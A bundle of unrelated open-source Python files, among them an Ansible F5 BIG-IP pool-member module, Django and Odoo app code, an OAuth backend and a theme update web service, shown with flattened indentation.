# Open Source Initiative OSI - The MIT License (MIT):Licensing
#
# The MIT License (MIT)
# Copyright (c) 2012 DotCloud Inc ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class ReqRep(object):
def process_call(self, context, bufchan, event, functor):
result = context.middleware_call_procedure(functor, *event.args)
bufchan.emit('OK', (result,), context.middleware_get_task_context())
def accept_answer(self, event):
return True
def process_answer(self, context, bufchan, event, method,
raise_remote_error):
result = event.args[0]
if event.name == 'ERR':
raise_remote_error(event)
bufchan.close()
bufchan.channel.close()
bufchan.channel.channel.close()
return result
class ReqStream(object):
def process_call(self, context, bufchan, event, functor):
xheader = context.middleware_get_task_context()
for result in iter(context.middleware_call_procedure(functor,
*event.args)):
bufchan.emit('STREAM', result, xheader)
bufchan.emit('STREAM_DONE', None, xheader)
def accept_answer(self, event):
return event.name in ('STREAM', 'STREAM_DONE')
def process_answer(self, context, bufchan, event, method,
raise_remote_error):
def iterator(event):
while event.name == 'STREAM':
yield event.args
event = bufchan.recv()
if event.name == 'ERR':
raise_remote_error(event)
bufchan.close()
bufchan.channel.channel.close()
return iterator(event)
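# Order matters below: ReqRep.accept_answer() accepts every event, so the
# more selective ReqStream pattern must be tried first when an answer is
# matched against patterns_list.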
patterns_list = [ReqStream(), ReqRep()]
|
gshivani/ansible-modules-extras | refs/heads/devel | network/f5/bigip_pool_member.py | 4 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Matt Hite <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: bigip_pool_member
short_description: "Manages F5 BIG-IP LTM pool members"
description:
- "Manages F5 BIG-IP LTM pool members via iControl SOAP API"
version_added: "1.4"
author: '"Matt Hite (@mhite)" <[email protected]>'
notes:
- "Requires BIG-IP software version >= 11"
- "F5 developed module 'bigsuds' required (see http://devcentral.f5.com)"
- "Best run as a local_action in your playbook"
- "Supersedes bigip_pool for managing pool members"
requirements:
- bigsuds
options:
server:
description:
- BIG-IP host
required: true
user:
description:
- BIG-IP username
required: true
password:
description:
- BIG-IP password
required: true
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 2.0
state:
description:
- Pool member state
required: true
default: present
choices: ['present', 'absent']
session_state:
description:
- Set new session availability status for pool member
version_added: "2.0"
required: false
default: null
choices: ['enabled', 'disabled']
monitor_state:
description:
- Set monitor availability status for pool member
version_added: "2.0"
required: false
default: null
choices: ['enabled', 'disabled']
pool:
description:
- Pool name. This pool must exist.
required: true
partition:
description:
- Partition
required: false
default: 'Common'
host:
description:
- Pool member IP
required: true
aliases: ['address', 'name']
port:
description:
- Pool member port
required: true
connection_limit:
description:
- Pool member connection limit. Setting this to 0 disables the limit.
required: false
default: null
description:
description:
- Pool member description
required: false
default: null
rate_limit:
description:
- Pool member rate limit (connections-per-second). Setting this to 0 disables the limit.
required: false
default: null
ratio:
description:
      - Pool member ratio weight. Valid values range from 1 through 100. New pool members -- unless overridden with this value -- default to 1.
required: false
default: null
'''
EXAMPLES = '''
## playbook task examples:
---
# file bigip-test.yml
# ...
- hosts: bigip-test
tasks:
- name: Add pool member
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=present
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
description="web server"
connection_limit=100
rate_limit=50
ratio=2
- name: Modify pool member ratio and description
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=present
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
ratio=1
description="nginx server"
- name: Remove pool member from pool
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=absent
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
# The BIG-IP GUI doesn't map directly to the API calls for "Pool ->
# Members -> State". The following states map to API monitor
# and session states.
#
# Enabled (all traffic allowed):
# monitor_state=enabled, session_state=enabled
# Disabled (only persistent or active connections allowed):
# monitor_state=enabled, session_state=disabled
# Forced offline (only active connections allowed):
# monitor_state=disabled, session_state=disabled
#
# See https://devcentral.f5.com/questions/icontrol-equivalent-call-for-b-node-down
- name: Force pool member offline
local_action: >
bigip_pool_member
server=lb.mydomain.com
user=admin
password=mysecret
state=present
session_state=disabled
monitor_state=disabled
pool=matthite-pool
partition=matthite
host="{{ ansible_default_ipv4["address"] }}"
port=80
'''
def pool_exists(api, pool):
# hack to determine if pool exists
result = False
try:
api.LocalLB.Pool.get_object_status(pool_names=[pool])
result = True
except bigsuds.OperationFailed, e:
if "was not found" in str(e):
result = False
else:
# genuine exception
raise
return result
def member_exists(api, pool, address, port):
# hack to determine if member exists
result = False
try:
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.get_member_object_status(pool_names=[pool],
members=[members])
result = True
except bigsuds.OperationFailed, e:
if "was not found" in str(e):
result = False
else:
# genuine exception
raise
return result
def delete_node_address(api, address):
result = False
try:
api.LocalLB.NodeAddressV2.delete_node_address(nodes=[address])
result = True
except bigsuds.OperationFailed, e:
if "is referenced by a member of pool" in str(e):
result = False
else:
# genuine exception
raise
return result
def remove_pool_member(api, pool, address, port):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.remove_member_v2(pool_names=[pool], members=[members])
def add_pool_member(api, pool, address, port):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.add_member_v2(pool_names=[pool], members=[members])
def get_connection_limit(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_connection_limit(pool_names=[pool], members=[members])[0][0]
return result
def set_connection_limit(api, pool, address, port, limit):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_connection_limit(pool_names=[pool], members=[members], limits=[[limit]])
def get_description(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_description(pool_names=[pool], members=[members])[0][0]
return result
def set_description(api, pool, address, port, description):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_description(pool_names=[pool], members=[members], descriptions=[[description]])
def get_rate_limit(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_rate_limit(pool_names=[pool], members=[members])[0][0]
return result
def set_rate_limit(api, pool, address, port, limit):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_rate_limit(pool_names=[pool], members=[members], limits=[[limit]])
def get_ratio(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_ratio(pool_names=[pool], members=[members])[0][0]
return result
def set_ratio(api, pool, address, port, ratio):
members = [{'address': address, 'port': port}]
api.LocalLB.Pool.set_member_ratio(pool_names=[pool], members=[members], ratios=[[ratio]])
def set_member_session_enabled_state(api, pool, address, port, session_state):
members = [{'address': address, 'port': port}]
session_state = ["STATE_%s" % session_state.strip().upper()]
api.LocalLB.Pool.set_member_session_enabled_state(pool_names=[pool], members=[members], session_states=[session_state])
def get_member_session_status(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_session_status(pool_names=[pool], members=[members])[0][0]
result = result.split("SESSION_STATUS_")[-1].lower()
return result
def set_member_monitor_state(api, pool, address, port, monitor_state):
members = [{'address': address, 'port': port}]
monitor_state = ["STATE_%s" % monitor_state.strip().upper()]
api.LocalLB.Pool.set_member_monitor_state(pool_names=[pool], members=[members], monitor_states=[monitor_state])
def get_member_monitor_status(api, pool, address, port):
members = [{'address': address, 'port': port}]
result = api.LocalLB.Pool.get_member_monitor_status(pool_names=[pool], members=[members])[0][0]
result = result.split("MONITOR_STATUS_")[-1].lower()
return result
def main():
    argument_spec = f5_argument_spec()
argument_spec.update(dict(
session_state = dict(type='str', choices=['enabled', 'disabled']),
monitor_state = dict(type='str', choices=['enabled', 'disabled']),
pool = dict(type='str', required=True),
host = dict(type='str', required=True, aliases=['address', 'name']),
port = dict(type='int', required=True),
connection_limit = dict(type='int'),
description = dict(type='str'),
rate_limit = dict(type='int'),
ratio = dict(type='int')
)
)
module = AnsibleModule(
argument_spec = argument_spec,
supports_check_mode=True
)
    (server, user, password, state, partition, validate_certs) = f5_parse_arguments(module)
session_state = module.params['session_state']
monitor_state = module.params['monitor_state']
pool = fq_name(partition, module.params['pool'])
connection_limit = module.params['connection_limit']
description = module.params['description']
rate_limit = module.params['rate_limit']
ratio = module.params['ratio']
host = module.params['host']
address = fq_name(partition, host)
port = module.params['port']
# sanity check user supplied values
if (host and not port) or (port and not host):
module.fail_json(msg="both host and port must be supplied")
    if port < 1 or port > 65535:
module.fail_json(msg="valid ports must be in range 1 - 65535")
try:
api = bigip_api(server, user, password)
if not pool_exists(api, pool):
module.fail_json(msg="pool %s does not exist" % pool)
result = {'changed': False} # default
if state == 'absent':
if member_exists(api, pool, address, port):
if not module.check_mode:
remove_pool_member(api, pool, address, port)
deleted = delete_node_address(api, address)
result = {'changed': True, 'deleted': deleted}
else:
result = {'changed': True}
elif state == 'present':
if not member_exists(api, pool, address, port):
if not module.check_mode:
add_pool_member(api, pool, address, port)
if connection_limit is not None:
set_connection_limit(api, pool, address, port, connection_limit)
if description is not None:
set_description(api, pool, address, port, description)
if rate_limit is not None:
set_rate_limit(api, pool, address, port, rate_limit)
if ratio is not None:
set_ratio(api, pool, address, port, ratio)
if session_state is not None:
set_member_session_enabled_state(api, pool, address, port, session_state)
if monitor_state is not None:
set_member_monitor_state(api, pool, address, port, monitor_state)
result = {'changed': True}
else:
# pool member exists -- potentially modify attributes
if connection_limit is not None and connection_limit != get_connection_limit(api, pool, address, port):
if not module.check_mode:
set_connection_limit(api, pool, address, port, connection_limit)
result = {'changed': True}
if description is not None and description != get_description(api, pool, address, port):
if not module.check_mode:
set_description(api, pool, address, port, description)
result = {'changed': True}
if rate_limit is not None and rate_limit != get_rate_limit(api, pool, address, port):
if not module.check_mode:
set_rate_limit(api, pool, address, port, rate_limit)
result = {'changed': True}
if ratio is not None and ratio != get_ratio(api, pool, address, port):
if not module.check_mode:
set_ratio(api, pool, address, port, ratio)
result = {'changed': True}
if session_state is not None:
session_status = get_member_session_status(api, pool, address, port)
if session_state == 'enabled' and session_status == 'forced_disabled':
if not module.check_mode:
set_member_session_enabled_state(api, pool, address, port, session_state)
result = {'changed': True}
                    elif session_state == 'disabled' and session_status != 'forced_disabled':
if not module.check_mode:
set_member_session_enabled_state(api, pool, address, port, session_state)
result = {'changed': True}
if monitor_state is not None:
monitor_status = get_member_monitor_status(api, pool, address, port)
if monitor_state == 'enabled' and monitor_status == 'forced_down':
if not module.check_mode:
set_member_monitor_state(api, pool, address, port, monitor_state)
result = {'changed': True}
elif monitor_state == 'disabled' and monitor_status != 'forced_down':
if not module.check_mode:
set_member_monitor_state(api, pool, address, port, monitor_state)
result = {'changed': True}
except Exception, e:
module.fail_json(msg="received exception: %s" % e)
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.f5 import *
main()
|
DemokratieInBewegung/abstimmungstool | refs/heads/master | voty/initproc/apps.py | 1 | from django.apps import AppConfig
from django.db.models.signals import post_migrate
from .globals import NOTIFICATIONS
def create_notice_types(sender, **kwargs):
from pinax.notifications.models import NoticeType
print("Creating notices for Initproc")
# Invitations
NoticeType.create(NOTIFICATIONS.INVITE.SEND,
'Einladung zu Initiative',
'Du wurdest zu einer neuen Initiative eingeladen')
NoticeType.create(NOTIFICATIONS.INVITE.ACCEPTED,
'Einladung angenommen',
'Die Einladung wurde angenommen')
NoticeType.create(NOTIFICATIONS.INVITE.REJECTED,
'Einladung abgelehnt',
'Die Einladung wurde abgelehnt')
# Initiative
NoticeType.create(NOTIFICATIONS.INITIATIVE.EDITED,
'Initiative überarbeitet',
'Die Initiative wurde überarbeitet')
NoticeType.create(NOTIFICATIONS.INITIATIVE.SUBMITTED,
'Initiative eingereicht',
'Die Initiative wurde eingereicht')
NoticeType.create(NOTIFICATIONS.INITIATIVE.PUBLISHED,
'Initiative veröffentlicht',
'Die Initiative wurde veröffentlicht')
NoticeType.create(NOTIFICATIONS.INITIATIVE.WENT_TO_DISCUSSION,
'Initiative in Diskussion',
'Die Initiative ist in die Diskussionsphase eingetreten')
NoticeType.create(NOTIFICATIONS.INITIATIVE.DISCUSSION_CLOSED,
'Diskussion zu Initiative beendet',
'Die Initiative kann jetzt final überarbeitet werden')
NoticeType.create(NOTIFICATIONS.INITIATIVE.WENT_TO_VOTE,
'Initiative in Abstimmung',
'Die Initiative ist in die Abstimmung gegangen')
# DISCUSSION
NoticeType.create(NOTIFICATIONS.INITIATIVE.NEW_ARGUMENT,
'Neues Argument in Diskussion zu Initiative',
'Es wurde ein neues Argument in der Diskussion zur Initiative gepostet')
class InitprocConfig(AppConfig):
name = 'voty.initproc'
verbose_name ="Initiative Process"
def ready(self):
post_migrate.connect(create_notice_types, sender=self) |
samedder/azure-cli | refs/heads/master | src/command_modules/azure-cli-consumption/azure/cli/command_modules/consumption/_transformers.py | 5 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
def transform_usage_output(result):
result.usage_start = result.usage_start.strftime("%Y-%m-%dT%H:%M:%SZ")
result.usage_end = result.usage_end.strftime("%Y-%m-%dT%H:%M:%SZ")
result.usage_quantity = str(result.usage_quantity)
result.billable_quantity = str(result.billable_quantity)
result.pretax_cost = str(result.pretax_cost)
if result.meter_details:
result.meter_details.total_included_quantity = str(result.meter_details.total_included_quantity)
result.meter_details.pretax_standard_rate = str(result.meter_details.pretax_standard_rate)
return result
def transform_usage_list_output(result):
return [transform_usage_output(item) for item in result]
|
dkubiak789/odoo | refs/heads/8.0 | addons/mass_mailing/wizard/test_mailing.py | 148 | # -*- coding: utf-8 -*-
from openerp import tools
from openerp.osv import osv, fields
class TestMassMailing(osv.TransientModel):
_name = 'mail.mass_mailing.test'
_description = 'Sample Mail Wizard'
_columns = {
'email_to': fields.char('Recipients', required=True,
help='Comma-separated list of email addresses.'),
'mass_mailing_id': fields.many2one('mail.mass_mailing', 'Mailing', required=True),
}
_defaults = {
'email_to': lambda self, cr, uid, ctx=None: self.pool['mail.message']._get_default_from(cr, uid, context=ctx),
}
def send_mail_test(self, cr, uid, ids, context=None):
Mail = self.pool['mail.mail']
for wizard in self.browse(cr, uid, ids, context=context):
mailing = wizard.mass_mailing_id
test_emails = tools.email_split(wizard.email_to)
mail_ids = []
for test_mail in test_emails:
mail_values = {
'email_from': mailing.email_from,
'reply_to': mailing.reply_to,
'email_to': test_mail,
'subject': mailing.name,
'body_html': '',
'notification': True,
'mailing_id': mailing.id,
}
mail_mail_obj = Mail.browse(cr, uid, Mail.create(cr, uid, mail_values, context=context), context=context)
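                # Build the test body by appending the unsubscribe link to the mailing body.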
unsubscribe_url = Mail._get_unsubscribe_url(cr, uid, mail_mail_obj, test_mail, context=context)
body = tools.append_content_to_html(mailing.body_html, unsubscribe_url, plaintext=False, container_tag='p')
                Mail.write(cr, uid, mail_mail_obj.id, {'body_html': body}, context=context)
mail_ids.append(mail_mail_obj.id)
Mail.send(cr, uid, mail_ids, context=context)
self.pool['mail.mass_mailing'].write(cr, uid, [mailing.id], {'state': 'test'}, context=context)
return True
|
nvbn/python-social-auth | refs/heads/master | social/backends/mailru.py | 1 | """
Mail.ru OAuth2 support
Take a look at http://api.mail.ru/docs/guides/oauth/
You need to register OAuth site here:
http://api.mail.ru/sites/my/add
Then update your settings values using registration information
"""
from hashlib import md5
from social.p3 import unquote
from social.backends.oauth import BaseOAuth2
class MailruOAuth2(BaseOAuth2):
"""Mail.ru authentication backend"""
name = 'mailru-oauth2'
ID_KEY = 'uid'
AUTHORIZATION_URL = 'https://connect.mail.ru/oauth/authorize'
ACCESS_TOKEN_URL = 'https://connect.mail.ru/oauth/token'
ACCESS_TOKEN_METHOD = 'POST'
EXTRA_DATA = [('refresh_token', 'refresh_token'),
('expires_in', 'expires')]
def get_user_details(self, response):
"""Return user details from Mail.ru request"""
values = {'username': unquote(response['nick']),
'email': unquote(response['email']),
'first_name': unquote(response['first_name']),
'last_name': unquote(response['last_name'])}
if values['first_name'] and values['last_name']:
values['fullname'] = '{0} {1}'.format(values['first_name'],
values['last_name'])
return values
def user_data(self, access_token, *args, **kwargs):
"""Return user data from Mail.ru REST API"""
key, secret = self.get_key_and_secret()
data = {'method': 'users.getInfo',
'session_key': access_token,
'app_id': key,
'secure': '1'}
param_list = sorted(list(item + '=' + data[item] for item in data))
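        # Sign the request: md5 of the sorted key=value pairs concatenated with the app secret.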
data['sig'] = md5(''.join(param_list) + secret).hexdigest()
return self.get_json('http://www.appsmail.ru/platform/api',
params=data)
|
Trafire/purchaseorders | refs/heads/master | lib/python2.7/sre_compile.py | 4 | /usr/lib/python2.7/sre_compile.py |
craigderington/studentloan5 | refs/heads/master | studentloan5/Lib/site-packages/django/conf/locale/nl/formats.py | 117 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d-%m-%Y', '%d-%m-%y', # '20-01-2009', '20-01-09'
'%d/%m/%Y', '%d/%m/%y', # '20/01/2009', '20/01/09'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
)
# Kept ISO formats as one is in first position
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '15:23:35'
'%H:%M:%S.%f', # '15:23:35.000200'
'%H.%M:%S', # '15.23:35'
'%H.%M:%S.%f', # '15.23:35.000200'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
)
DATETIME_INPUT_FORMATS = (
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S',
# '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
'%d/%m/%Y %H:%M:%S', '%d/%m/%y %H:%M:%S', '%Y/%m/%d %H:%M:%S',
# '20/01/2009 15:23:35', '20/01/09 15:23:35', '2009/01/20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
# '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 2009 15:23:35'
# With time in %H:%M:%S.%f :
'%d-%m-%Y %H:%M:%S.%f', '%d-%m-%y %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S.%f',
# '20-01-2009 15:23:35.000200', '20-01-09 15:23:35.000200', '2009-01-20 15:23:35.000200'
'%d/%m/%Y %H:%M:%S.%f', '%d/%m/%y %H:%M:%S.%f', '%Y/%m/%d %H:%M:%S.%f',
# '20/01/2009 15:23:35.000200', '20/01/09 15:23:35.000200', '2009/01/20 15:23:35.000200'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
'%d/%m/%Y %H.%M:%S', '%d/%m/%y %H.%M:%S', # '20/01/2009 15.23:35', '20/01/09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
# '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 2009 15.23:35'
# With time in %H.%M:%S.%f :
'%d-%m-%Y %H.%M:%S.%f', '%d-%m-%y %H.%M:%S.%f', # '20-01-2009 15.23:35.000200', '20-01-09 15.23:35.000200'
'%d/%m/%Y %H.%M:%S.%f', '%d/%m/%y %H.%M:%S.%f', # '20/01/2009 15.23:35.000200', '20/01/09 15.23:35.000200'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
'%d/%m/%Y %H:%M', '%d/%m/%y %H:%M', '%Y/%m/%d %H:%M', # '20/01/2009 15:23', '20/01/09 15:23', '2009/01/20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
# '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 2009 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
'%d/%m/%Y %H.%M', '%d/%m/%y %H.%M', # '20/01/2009 15.23', '20/01/09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
# '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 2009 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
'%d/%m/%Y', '%d/%m/%y', '%Y/%m/%d', # '20/01/2009', '20/01/09', '2009/01/20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 2009'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
dfdx2/django | refs/heads/master | tests/check_framework/urls/beginning_with_slash.py | 76 | from django.conf.urls import url
urlpatterns = [
url(r'/starting-with-slash/$', lambda x: x),
]
|
flyfei/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/test/badsyntax_future6.py | 383 | """This is a test"""
"this isn't a doc string"
from __future__ import nested_scopes
def f(x):
def g(y):
return x + y
return g
result = f(2)(4)
|
SuriyaaKudoIsc/olympia | refs/heads/master | services/theme_update.py | 16 | import base64
import json
import os
import posixpath
import re
from time import time
from wsgiref.handlers import format_date_time
from constants import base
from utils import log_configure, log_exception, mypool
from services.utils import settings, user_media_path, user_media_url
# Configure the log.
log_configure()
# This has to be imported after the settings (utils).
from django_statsd.clients import statsd
class ThemeUpdate(object):
def __init__(self, locale, id_, qs=None):
self.conn, self.cursor = None, None
self.from_gp = qs == 'src=gp'
self.data = {
'locale': locale,
'id': id_,
# If we came from getpersonas.com, then look up by `persona_id`.
# Otherwise, look up `addon_id`.
'primary_key': 'persona_id' if self.from_gp else 'addon_id',
'atype': base.ADDON_PERSONA,
'row': {}
}
if not self.cursor:
self.conn = mypool.connect()
self.cursor = self.conn.cursor()
def base64_icon(self, addon_id):
path = self.image_path('icon.jpg')
if not os.path.isfile(path):
return ''
try:
            with open(path, 'rb') as f:
return base64.b64encode(f.read())
except IOError, e:
if len(e.args) == 1:
log_exception('I/O error: {0}'.format(e[0]))
else:
log_exception('I/O error({0}): {1}'.format(e[0], e[1]))
return ''
def get_headers(self, length):
return [('Cache-Control', 'public, max-age=3600'),
('Content-Length', str(length)),
('Content-Type', 'application/json'),
('Expires', format_date_time(time() + 3600)),
('Last-Modified', format_date_time(time()))]
def get_update(self):
"""
TODO:
* When themes have versions let's not use
`personas.approve` as a `modified` timestamp. Either set this
during theme approval, or let's keep a hash of the header and
footer.
* Do a join on `addons_users` to get the actual correct user.
We're cheating and setting `personas.display_username` during
submission/management heh. But `personas.author` and
`personas.display_username` are not what we want.
"""
sql = """
SELECT p.persona_id, a.id, a.slug, v.version,
t_name.localized_string AS name,
t_desc.localized_string AS description,
p.display_username, p.header,
p.footer, p.accentcolor, p.textcolor,
UNIX_TIMESTAMP(a.modified) AS modified
FROM addons AS a
LEFT JOIN personas AS p ON p.addon_id=a.id
LEFT JOIN versions AS v ON a.current_version=v.id
LEFT JOIN translations AS t_name
ON t_name.id=a.name AND t_name.locale=%(locale)s
LEFT JOIN translations AS t_desc
ON t_desc.id=a.summary AND t_desc.locale=%(locale)s
WHERE p.{primary_key}=%(id)s AND
a.addontype_id=%(atype)s AND a.status=4 AND a.inactive=0
""".format(primary_key=self.data['primary_key'])
self.cursor.execute(sql, self.data)
row = self.cursor.fetchone()
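        # Map the flat result tuple onto named columns.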
row_to_dict = lambda row: dict(zip((
'persona_id', 'addon_id', 'slug', 'current_version', 'name',
'description', 'username', 'header', 'footer', 'accentcolor',
'textcolor', 'modified'),
list(row)))
if row:
self.data['row'] = row_to_dict(row)
# Fall back to `en-US` if the name was null for our locale.
# TODO: Write smarter SQL and don't rerun the whole query.
if not self.data['row']['name']:
self.data['locale'] = 'en-US'
self.cursor.execute(sql, self.data)
row = self.cursor.fetchone()
if row:
self.data['row'] = row_to_dict(row)
return True
return False
# TODO: Cache on row['modified']
def get_json(self):
if not self.get_update():
# Persona not found.
return
row = self.data['row']
accent = row.get('accentcolor')
text = row.get('textcolor')
id_ = str(row[self.data['primary_key']])
data = {
'id': id_,
'name': row.get('name'),
'description': row.get('description'),
# TODO: Change this to be `addons_users.user.username`.
'author': row.get('username'),
# TODO: Change this to be `addons_users.user.display_name`.
'username': row.get('username'),
'headerURL': self.image_url(row['header']),
'footerURL': self.image_url(row['footer']),
'detailURL': self.locale_url(settings.SITE_URL,
'/addon/%s/' % row['slug']),
'previewURL': self.image_url('preview.png'),
'iconURL': self.image_url('icon.png'),
'dataurl': self.base64_icon(row['addon_id']),
'accentcolor': '#%s' % accent if accent else None,
'textcolor': '#%s' % text if text else None,
'updateURL': self.locale_url(settings.VAMO_URL,
'/themes/update-check/' + id_),
# 04-25-2013: Bumped for GP migration so we get new `updateURL`s.
'version': row.get('current_version', 0)
}
# If this theme was originally installed from getpersonas.com,
# we have to use the `<persona_id>?src=gp` version of the `updateURL`.
if self.from_gp:
data['updateURL'] += '?src=gp'
return json.dumps(data)
def image_path(self, filename):
row = self.data['row']
# Special cased for non-AMO-uploaded themes imported from getpersonas.
if row['persona_id'] != 0:
if filename == 'preview.png':
filename = 'preview.jpg'
elif filename == 'icon.png':
filename = 'preview_small.jpg'
return os.path.join(user_media_path('addons'), str(row['addon_id']),
filename)
def image_url(self, filename):
row = self.data['row']
# Special cased for non-AMO-uploaded themes imported from getpersonas.
if row['persona_id'] != 0:
if filename == 'preview.png':
filename = 'preview.jpg'
elif filename == 'icon.png':
filename = 'preview_small.jpg'
image_url = posixpath.join(user_media_url('addons'),
str(row['addon_id']), filename or '')
modified = int(row['modified']) if row['modified'] else 0
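        # Use the modified timestamp as a cache-busting query string.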
return '%s?%s' % (image_url, modified)
def locale_url(self, domain, url):
return '%s/%s%s' % (domain, self.data.get('locale', 'en-US'), url)
url_re = re.compile('(?P<locale>.+)?/themes/update-check/(?P<id>\d+)$')
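# Matches paths like "/en-US/themes/update-check/1234"; the locale prefix is optional.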
def application(environ, start_response):
"""
Developing locally?
gunicorn -b 0.0.0.0:7000 -w 12 -k sync -t 90 --max-requests 5000 \
-n gunicorn-theme_update services.wsgi.theme_update:application
"""
status = '200 OK'
with statsd.timer('services.theme_update'):
data = environ['wsgi.input'].read()
try:
locale, id_ = url_re.match(environ['PATH_INFO']).groups()
locale = (locale or 'en-US').lstrip('/')
id_ = int(id_)
except AttributeError: # URL path incorrect.
start_response('404 Not Found', [])
return ['']
try:
update = ThemeUpdate(locale, id_, environ.get('QUERY_STRING'))
output = update.get_json()
if not output:
start_response('404 Not Found', [])
return ['']
start_response(status, update.get_headers(len(output)))
except:
log_exception(data)
raise
return [output]
|
mattesno1/CouchPotatoServer | refs/heads/master | libs/pyutil/randutil.py | 92 | # Copyright (c) 2002-2012 Zooko Wilcox-O'Hearn
# This file is part of pyutil; see README.rst for licensing terms.
import warnings
import os, random
try:
import hashexpand
